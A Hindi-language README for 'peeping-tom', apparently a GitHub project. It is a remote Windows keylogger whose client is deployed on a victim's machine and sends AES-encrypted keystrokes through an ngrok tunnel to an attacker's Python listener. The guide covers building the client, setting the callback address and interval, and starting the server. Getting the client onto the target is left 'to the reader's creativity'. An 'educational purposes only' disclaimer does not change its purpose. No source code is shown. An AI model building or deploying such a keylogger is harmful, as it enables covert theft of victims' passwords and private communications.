
AES-256 एन्क्रिप्टेड कीस्ट्रोक एक्सफिल्ट्रेशन के साथ रिमोट विंडोज कीलॉगर, कॉन्फ़िगरेबल कॉलबैक अंतराल और लॉग विश्लेषण के लिए एक सहयोगी पायथन सर्वर के माध्यम से।
peeping-tom प्रोजेक्ट रेपो में आपका स्वागत है! Peeping-tom एक दो-भाग वाला प्रोग्राम है जिसमें एक peeping-client (जो लक्ष्य पर तैनात किया जाता है) और एक toms-server (जो हमलावर की मशीन पर कीलॉग्स सुनता है) शामिल है। इसे चलाने के लिए काफी सेटअप की आवश्यकता होती है, इसलिए कृपया नीचे दिए गए निर्देशों को ध्यान से पढ़ें और उनका पालन करें।
बेशक, यदि आपके पास कोई सुझाव, प्रतिक्रिया, समस्या आदि हैं, तो बेझिझक संपर्क करें या कोई issue या pull request बनाएं।
चरण 1: Visual Studio में peeping-tom समाधान फ़ाइल खोलें
सबसे पहले, उपरोक्त लिंक से अपनी मशीन पर Visual Studio का कम्युनिटी संस्करण डाउनलोड और इंस्टॉल करें। इंस्टॉलर में आगे बढ़ते समय, सुनिश्चित करें कि आपने "Python development" और "Desktop development with C++" वर्कलोड का चयन किया है, क्योंकि प्रोजेक्ट को ठीक से लोड और कंपाइल करने के लिए ये आवश्यक होंगे।

एक बार सब कुछ इंस्टॉल हो जाने के बाद, Visual Studio लॉन्च करें और "Clone a repository" विकल्प चुनें। प्रोजेक्ट का git URL दर्ज करें और क्लोन पर क्लिक करें।

यदि सब कुछ सही ढंग से लोड हो गया, तो आपको दाईं ओर समाधान एक्सप्लोरर विंडो में दोनों प्रोजेक्ट दिखाई देने चाहिए जैसा कि नीचे दिखाया गया है।

चरण 2: Visual Studio में कंपाइलर/लिंकर विकल्प कॉन्फ़िगर करें
अब जब टूल Visual Studio में लोड हो गया है, तो हमें कुछ विकल्प बदलने और बिल्ड करने से पहले एक लाइब्रेरी को कंपाइल करने की आवश्यकता होगी। इससे लक्ष्य पर चलते समय किसी भी प्रोग्राम/लाइब्रेरी निर्भरता को हटा दिया जाएगा।
पहला कार्य Crypto++ लाइब्रेरी को स्टैटिक रूप से कंपाइल करना है, जिसका उपयोग कीलॉगर में एन्क्रिप्शन के लिए किया जाता है। इस प्रक्रिया को यहाँ से लाइब्रेरी का संस्करण 8.6.0 डाउनलोड करके शुरू करें।
एक बार जब आपने ZIP फ़ाइल डाउनलोड कर ली, तो इसे एक फ़ोल्डर में निकालें, उसमें जाएँ, और Visual Studio के साथ cryptest.sln लॉन्च करें। अब आपके पास दो Visual Studio विंडो होनी चाहिए, एक में peeping-tom समाधान और दूसरी में cryptest समाधान खुला होगा।

एक बार Visual Studio में cryptest.sln फ़ाइल लोड हो जाए, तो शीर्ष टूलबार पर "Debug" पर क्लिक करें और इसे "Release" पर सेट करें। साथ ही आर्किटेक्चर को नीचे दिखाए गए अनुसार x64 में बदलें।

अब, cryptlib प्रोजेक्ट पर राइट-क्लिक करें, और गुण चुनें। हाइलाइट किए गए विकल्प को दिखाए अनुसार बदलें।

एक बार यह पूरा हो जाने पर, cryptest समाधान बनाएँ।

बिल्ड में एक-दो मिनट लगेंगे, लेकिन एक बार यह हो जाने पर, नीचे दिए गए पथ के आपके संस्करण में cryptlib.lib नामक एक फ़ाइल दिखाई देनी चाहिए। फ़ाइल ढूँढें और अगले चरण के लिए इसका पथ कॉपी करें।
C:\Users\Abdullah Beta\Downloads\cryptopp860\x64\Output\Release\cryptlib.lib
एक बार जब आप फ़ाइल ढूँढ लें और उसका पथ कॉपी कर लें, तो Visual Studio विंडो पर वापस जाएँ जिसमें peeping-tom समाधान खुला है। peeping-client प्रोजेक्ट पर राइट-क्लिक करें, और गुण चुनें। नीचे स्क्रीनशॉट में दिखाए गए विकल्प पर जाएँ, और cryptlib.lib का पथ पेस्ट करें।

सुनिश्चित करें कि peeping-client प्रोजेक्ट भी "Release" पर सेट है और आर्किटेक्चर x64 पर सेट है। अभी तक peeping-tom समाधान न बनाएँ क्योंकि स्रोत कोड में अभी भी कुछ बदलाव किए जाने हैं।
चरण 3: लोकलहोस्ट:80 के लिए एक सार्वजनिक टनल खोलें
अब टनल की ओर बढ़ते हैं। एक बार जब आपने Ngrok खाता बना लिया, तो उपरोक्त लिंक से अपने OS के लिए Ngrok डाउनलोड करें और ZIP फ़ाइल से निष्पादन योग्य निकालें। टनल खोलने से पहले, आपको नीचे दिखाए अनुसार अपने खाते से एक व्यक्तिगत प्रमाणीकरण टोकन प्राप्त करना होगा।

एक बार आपके पास टोकन हो, तो इसे निम्नलिखित कमांड के साथ Ngrok के स्थानीय कॉन्फ़िगरेशन में जोड़ें:
ngrok config add-authtoken 7cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxmgZ5
अंत में, निम्नलिखित कमांड का उपयोग करके टनल खोलें:
ngrok http 80 --scheme=http
यदि सब कुछ ठीक रहा, तो आपको नीचे चित्र के समान कुछ दिखाई देगा। बढ़िया! अब आप इस चरण के लिए तैयार हैं। आगे बढ़ें और हाइलाइट किए गए "Forwarding" पते को लें और इसे बाद में उपयोग के लिए कहीं सुरक्षित रखें।

चरण 4: नई AES-256 कुंजी उत्पन्न करें
इस बिंदु पर, आप अपनी मशीन पर Python डाउनलोड कर सकते हैं। एक बार यह इंस्टॉल हो जाने पर, toms-server प्रोजेक्ट निर्देशिका में एक CMD विंडो खोलें।
आवश्यक निर्भरताएँ स्थापित करें:
pip3 install -r requirements.txt
एक बार सब कुछ तैयार हो जाने पर, चलाएँ:
python3 toms-server.py -m keygen
यह एक 64 अक्षरों की AES-256 कुंजी आउटपुट करेगा जिसकी आपको बाद में भी आवश्यकता होगी, इसलिए इसे Ngrok फ़ॉरवर्डिंग पते के साथ सहेजना सुनिश्चित करें।
चरण 5: peeping-client स्रोत में आवश्यक फ़ील्ड सेट करें
अब, हमारे पास शुरू करने के लिए आवश्यक सब कुछ है। समाधान एक्सप्लोरर से peeping-client project->source files->peeping-client.cpp स्रोत फ़ाइल खोलें। नीचे दिखाए गए main() फ़ंक्शन के पहले दो वेरिएबल्स में प्रासंगिक जानकारी दर्ज करें।

आपकी जानकारी दर्ज होने के बाद, peeping-client project->header files->APIHook.h पर जाएँ और नीचे चित्र में "15" को सेकंड में अपने वांछित कॉलबैक अंतराल से बदलें (अर्थात, हर दो घंटे में कॉलबैक के लिए 15 को 7200 में बदलें... आप समझ गए होंगे)।

अंत में, प्रोजेक्ट बनाएँ और आपको निम्नलिखित स्थान के अपने संस्करण में एक निष्पादन योग्य मिलना चाहिए:
C:\Users\Abdullah Beta\source\repos\peeping-client\x64\Release
बधाई हो! अब आपके पास एक पूरी तरह से अनुकूलित कीलॉगर है जो नियमित अंतराल पर एन्क्रिप्टेड कीबोर्ड डेटा के साथ कॉलबैक करने के लिए कॉन्फ़िगर किया गया है।
चरण 6: सुनने वाला सर्वर प्रारंभ करें
अंतिम चरण लक्ष्य से आने वाले कीलॉग्स को सुनना शुरू करना है। आप निम्नलिखित कमांड के साथ सर्वर को लिसनिंग मोड में प्रारंभ कर सकते हैं:
python3 toms-server.py -m server
एक बार सर्वर प्रारंभ हो जाने पर, वही सटीक AES कुंजी दर्ज करें जो आपने पहले उत्पन्न की थी और peeping-client.cpp स्रोत फ़ाइल में उपयोग की थी। यदि कुंजी स्वीकार हो जाती है, तो आपको एक संदेश मिलना चाहिए जिसमें कहा गया हो कि सर्वर प्रारंभ हो गया है!
चरण 7: लॉग का विश्लेषण करें + महत्वपूर्ण नोट्स
अब केवल लक्ष्य पर नव-निर्मित peeping-client.exe को निष्पादित करना शेष है। मैं इसे करने का तरीका आपकी रचनात्मकता पर छोड़ता हूँ। आपके द्वारा निर्धारित अंतराल हर बार बीतने पर, आपको टर्मिनल पर एक संदेश प्राप्त होगा।
चेतावनी: *कृपया इस अवधि के दौरान इंटरनेट कनेक्शन न खोएं या अपनी Ngrok टनल को बंद न करें, क्योंकि इससे लक्ष्य पर peeping-client.exe प्रोग्राम को फिर से निष्पादित करने की आवश्यकता होगी। *
सभी कीलॉग्स toms-server स्क्रिप्ट की निर्देशिका में keylog.txt फ़ाइल में लिखे जाएंगे और वहाँ से देखे जा सकते हैं। निर्देशों के लिए बस इतना ही, आशा है कि आप बिना किसी बड़ी बाधा के सब कुछ चला पाए!
जल्द ही आ रहा है!
pip3 install requests
इस रिपॉजिटरी में योगदान करते समय, कृपया उन परिवर्तनों पर चर्चा करें जो आप issue, ईमेल, या LinkedIn के माध्यम से करना चाहते हैं।
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस प्रोजेक्ट के साथ किया गया कोई भी गलत व्यवहार उपयोगकर्ता की अपनी जिम्मेदारी है। मैं किसी भी अवैध कार्यों के लिए जिम्मेदारी छोड़ता हूँ।
यह प्रोजेक्ट आंशिक रूप से Ermin Kreponic के Udemy कोर्स द्वारा निर्देशित था और इसे मेरे कुछ नए विचारों और मेरे द्वारा सीखे गए नए कौशलों को शामिल करने के लिए संशोधित किया गया था।
लेखक - अब्दुल्ला अंसारी ©
संपर्क जानकारी - ईमेल